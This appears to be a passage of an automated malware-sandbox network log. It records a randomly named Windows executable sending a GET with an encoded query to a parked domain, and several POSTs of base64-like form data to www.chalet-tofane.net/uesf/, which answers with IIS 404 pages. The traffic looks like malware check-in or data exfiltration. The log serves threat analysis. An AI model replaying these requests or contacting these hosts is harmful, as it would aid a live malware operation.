                                Sep 23, 2024 14:39:19.083887100 CEST603INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGEzMmMwZDctMDcwYi00MTJjLTg4MGEtNmQ1ZTc1YzQyOTU1IiwicGFnZV90aW1lIjoxNzI3MDk1MT


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                36192.168.2.749740199.59.243.227803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:21.172652960 CEST486OUTGET /8dtf/?76=n4Dn6BhRGXgBCc8VvzeMEOXmG0Elz5lGLePoshfoMkwgvj9XBMT8fCSzJRDbu+yD5cpoNGctvaCBzFD7eo0ZE+1Jdoxfd5POcRUtDqQJ70nv82NNqRSJamvbeDYUZbHlz6Y0RwscVapw&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.donante-de-ovulos.biz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:39:21.619105101 CEST1236INHTTP/1.1 200 OK
                                date: Mon, 23 Sep 2024 12:39:21 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1514
                                x-request-id: 2272f143-d394-4c2c-885c-7b7065c73d99
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vObKN4LyiXLUjm+BK+jqgSa5aSzKRzCEpGGuyHiZr4t1/KUPb9U6Qp6AplDofR1gMf2QqvqZ8dtWPMEg/0DZ/Q==
                                set-cookie: parking_session=2272f143-d394-4c2c-885c-7b7065c73d99; expires=Mon, 23 Sep 2024 12:54:21 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 4f 62 4b 4e 34 4c 79 69 58 4c 55 6a 6d 2b 42 4b 2b 6a 71 67 53 61 35 61 53 7a 4b 52 7a 43 45 70 47 47 75 79 48 69 5a 72 34 74 31 2f 4b 55 50 62 39 55 36 51 70 36 41 70 6c 44 6f 66 52 31 67 4d 66 32 51 71 76 71 5a 38 64 74 57 50 4d 45 67 2f 30 44 5a 2f 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vObKN4LyiXLUjm+BK+jqgSa5aSzKRzCEpGGuyHiZr4t1/KUPb9U6Qp6AplDofR1gMf2QqvqZ8dtWPMEg/0DZ/Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Sep 23, 2024 14:39:21.619121075 CEST967INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjI3MmYxNDMtZDM5NC00YzJjLTg4NWMtN2I3MDY1YzczZDk5IiwicGFnZV90aW1lIjoxNzI3MDk1MT


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                37192.168.2.74974162.149.128.40803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:26.701318979 CEST755OUTPOST /uesf/ HTTP/1.1
                                Host: www.chalet-tofane.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.chalet-tofane.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.chalet-tofane.net/uesf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 2b 36 68 68 67 52 6c 2b 61 42 32 39 6d 44 52 4b 7a 43 67 38 68 77 78 39 46 31 4f 58 69 4a 70 43 45 39 64 51 44 67 4e 49 49 79 44 36 52 47 34 44 6e 45 68 44 6e 4c 34 75 30 47 47 72 2b 64 6b 78 4b 61 42 39 70 74 5a 37 6f 57 2b 61 6a 47 61 6c 78 56 68 6b 69 61 77 4d 43 57 33 67 38 79 6e 6b 39 56 63 61 70 4c 69 39 6b 56 39 65 34 45 4e 78 49 35 53 42 6d 5a 79 74 6a 33 4f 66 42 49 30 56 61 4d 54 37 65 6f 30 33 41 4c 67 37 64 32 6d 5a 42 6d 70 48 2f 30 44 53 32 2f 2f 66 4f 48 2b 77 44 38 54 69 72 64 52 54 56 6a 42 37 57 2b 4b 6a 66 2f 52 4e 70 36 54 2f 50 45 56 63 4a 65 67 30 77 71 79 5a 4c 50 33 45 59 6a 6b 76 75 75 2f 66 4f 41 3d 3d
                                Data Ascii: 76=+6hhgRl+aB29mDRKzCg8hwx9F1OXiJpCE9dQDgNIIyD6RG4DnEhDnL4u0GGr+dkxKaB9ptZ7oW+ajGalxVhkiawMCW3g8ynk9VcapLi9kV9e4ENxI5SBmZytj3OfBI0VaMT7eo03ALg7d2mZBmpH/0DS2//fOH+wD8TirdRTVjB7W+Kjf/RNp6T/PEVcJeg0wqyZLP3EYjkvuu/fOA==
                                Sep 23, 2024 14:39:27.378319025 CEST1236INHTTP/1.1 404 Not Found
                                Cache-Control: private
                                Content-Type: text/html; charset=utf-8
                                Server: Microsoft-IIS/10.0
                                X-Powered-By: ASP.NET
                                Date: Mon, 23 Sep 2024 12:39:27 GMT
                                Connection: close
                                Content-Length: 4953
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                Sep 23, 2024 14:39:27.378333092 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                Sep 23, 2024 14:39:27.378353119 CEST448INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                Sep 23, 2024 14:39:27.378359079 CEST1236INData Raw: 65 73 3a 3c 2f 68 34 3e 20 0a 20 20 3c 75 6c 3e 20 09 3c 6c 69 3e 54 68 65 20 64 69 72 65 63 74 6f 72 79 20 6f 72 20 66 69 6c 65 20 73 70 65 63 69 66 69 65 64 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 6f 6e 20 74 68 65 20 57 65 62 20 73 65
                                Data Ascii: es:</h4> <ul> <li>The directory or file specified does not exist on the Web server.</li> <li>The URL contains a typographical error.</li> <li>A custom filter or module, such as URLScan, restricts access to the file.</li> </ul> </fields
                                Sep 23, 2024 14:39:27.378366947 CEST1016INData Raw: 64 65 74 61 69 6c 73 2d 72 69 67 68 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c
                                Data Ascii: details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>&nbsp;&nbsp;&nbsp;http://www.chalet-tofane.net:80/uesf/</td></tr> <tr><th>Physical Path</th><td>&nbsp;&nbsp;&nbsp;D:\ine


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                38192.168.2.74974262.149.128.40803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:29.251688004 CEST775OUTPOST /uesf/ HTTP/1.1
                                Host: www.chalet-tofane.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.chalet-tofane.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.chalet-tofane.net/uesf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 2b 36 68 68 67 52 6c 2b 61 42 32 39 6d 6a 68 4b 2f 46 4d 38 32 41 78 2b 62 6c 4f 58 6f 70 70 4f 45 39 42 51 44 68 5a 59 49 41 6e 36 52 6d 6f 44 6d 47 5a 44 72 72 34 75 38 6d 47 75 6a 4e 6b 71 4b 61 4d 43 70 70 5a 37 6f 53 57 61 6a 48 71 6c 78 6d 35 6e 6b 4b 78 71 4b 32 33 6d 68 69 6e 6b 39 56 63 61 70 4b 48 61 6b 56 6c 65 34 33 56 78 61 49 53 41 6c 5a 79 73 72 58 4f 66 46 49 30 5a 61 4d 54 6a 65 73 73 64 41 4a 6f 37 64 33 57 5a 42 58 70 47 6f 6b 44 55 70 76 2b 63 4c 6c 58 62 5a 4f 62 42 70 37 52 71 53 42 4e 77 65 6f 58 42 46 64 64 68 33 72 72 45 4c 47 78 71 65 34 39 42 79 72 32 42 47 74 44 6c 48 55 42 46 6a 38 65 62 59 36 49 53 76 54 57 79 64 37 34 57 70 4a 4c 30 61 51 6e 57 48 69 41 3d
                                Data Ascii: 76=+6hhgRl+aB29mjhK/FM82Ax+blOXoppOE9BQDhZYIAn6RmoDmGZDrr4u8mGujNkqKaMCppZ7oSWajHqlxm5nkKxqK23mhink9VcapKHakVle43VxaISAlZysrXOfFI0ZaMTjessdAJo7d3WZBXpGokDUpv+cLlXbZObBp7RqSBNweoXBFddh3rrELGxqe49Byr2BGtDlHUBFj8ebY6ISvTWyd74WpJL0aQnWHiA=
                                Sep 23, 2024 14:39:29.906673908 CEST1236INHTTP/1.1 404 Not Found
                                Cache-Control: private
                                Content-Type: text/html; charset=utf-8
                                Server: Microsoft-IIS/10.0
                                X-Powered-By: ASP.NET
                                Date: Mon, 23 Sep 2024 12:39:29 GMT
                                Connection: close
                                Content-Length: 4953
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                Sep 23, 2024 14:39:29.906691074 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                Sep 23, 2024 14:39:29.906694889 CEST1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                Sep 23, 2024 14:39:29.906776905 CEST1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                Sep 23, 2024 14:39:29.906783104 CEST228INData Raw: 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                39192.168.2.74974362.149.128.40803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:31.799983025 CEST1788OUTPOST /uesf/ HTTP/1.1
                                Host: www.chalet-tofane.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.chalet-tofane.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.chalet-tofane.net/uesf/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 2b 36 68 68 67 52 6c 2b 61 42 32 39 6d 6a 68 4b 2f 46 4d 38 32 41 78 2b 62 6c 4f 58 6f 70 70 4f 45 39 42 51 44 68 5a 59 49 41 76 36 57 55 51 44 6d 68 31 44 71 72 34 75 67 32 47 76 6a 4e 6b 72 4b 61 55 47 70 70 64 42 6f 51 75 61 6c 56 69 6c 67 6e 35 6e 74 4b 78 71 47 57 33 6e 38 79 6d 2b 39 56 4d 57 70 4b 58 61 6b 56 6c 65 34 79 5a 78 5a 5a 53 41 70 35 79 74 6a 33 4f 54 42 49 30 31 61 49 2f 64 65 73 67 6e 48 39 6b 37 64 58 47 5a 44 46 52 47 72 45 44 57 71 76 2b 2b 4c 6c 4c 45 5a 4f 48 4e 70 37 4d 50 53 42 31 77 4f 63 43 4c 65 66 4a 71 6b 4b 54 4c 43 6d 78 6d 57 4f 30 79 79 62 72 6e 41 39 6a 68 48 55 56 78 72 39 62 55 4d 36 56 33 7a 7a 75 6d 53 49 6f 68 6d 4d 61 54 5a 77 2f 6c 66 45 34 44 7a 63 45 4f 71 4b 6c 62 79 38 35 4c 4f 4e 61 4a 6d 49 41 54 69 54 6d 65 36 57 44 33 47 6d 52 71 39 59 74 71 53 43 59 35 45 71 46 32 42 31 41 31 51 35 52 78 48 4b 53 43 35 64 62 35 4d 54 37 6b 5a 64 6e 62 53 39 58 46 4b 42 48 6e 34 7a 4c 53 66 79 6f 6d 5a 6c 36 4b 64 35 33 74 79 75 49 62 41 79 34 78 67 50 34 [TRUNCATED]
                                Data Ascii: 76=+6hhgRl+aB29mjhK/FM82Ax+blOXoppOE9BQDhZYIAv6WUQDmh1Dqr4ug2GvjNkrKaUGppdBoQualVilgn5ntKxqGW3n8ym+9VMWpKXakVle4yZxZZSAp5ytj3OTBI01aI/desgnH9k7dXGZDFRGrEDWqv++LlLEZOHNp7MPSB1wOcCLefJqkKTLCmxmWO0yybrnA9jhHUVxr9bUM6V3zzumSIohmMaTZw/lfE4DzcEOqKlby85LONaJmIATiTme6WD3GmRq9YtqSCY5EqF2B1A1Q5RxHKSC5db5MT7kZdnbS9XFKBHn4zLSfyomZl6Kd53tyuIbAy4xgP43dHykAHU6T0oM++L+Mavcx2uqQGubjSrcNyfJLgaJARapo/WQq+f64S55m8kLUCUOQ42PUNnk5kJzDy/Bwyel53n4hZYXwoFBeGhzRD+g3ICSptgoSucqzjFSIiQwQ8jjnvguLbXCKv0zdnq67p0Su1IQ7zHMMTBpMnnqPv7Bmrn5yQjmQK7rzSF4sIYGSSxsKMgGVIE+5BTD1IeGUSM0ygXG/OZ8vYQ23NwFFYuDg8ZSngcgaPbF4beUthzIb8mbmRE2YjiVJ1BauXuOSrkapLlamPgTZtklOTWDodifRsg+eASAnPojiFPUS2kSDY9zzbR9k88IbmHMGaVVNnCsIUNsbZSdCe7MOk7eUXnprkb0h8yPDPvjIEXM8i5tvmcYxLDQ83XM7hOtghYu5D88XkRoAhMXVdEXQonWgX8wpk7dMWC9xjz+WR2l9r7fGSA9h5p9eL+u9ybawH+1FiRlzuw3zF3ek2LjqUqJ2dYICOmGvGQtaVzof+NnJF0KV6OIvPVVqxgbwhIcB7Fle7ihw0DFjq+mssHT7d9TrDtvFN4gbTqFoIqxT+TOerCpI+ArAvlVz9sPmiBS0U6vG4QVcfhy3fu5vdc4ByhZO3sYpWxv18OjlY+jJlMwpN8zRndfmnvEk7hAO583YgdryVqA372f3roCOB4Nw [TRUNCATED]
                                Sep 23, 2024 14:39:32.458868027 CEST1236INHTTP/1.1 404 Not Found
                                Cache-Control: private
                                Content-Type: text/html; charset=utf-8
                                Server: Microsoft-IIS/10.0
                                X-Powered-By: ASP.NET
                                Date: Mon, 23 Sep 2024 12:39:32 GMT
                                Connection: close
                                Content-Length: 4953
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
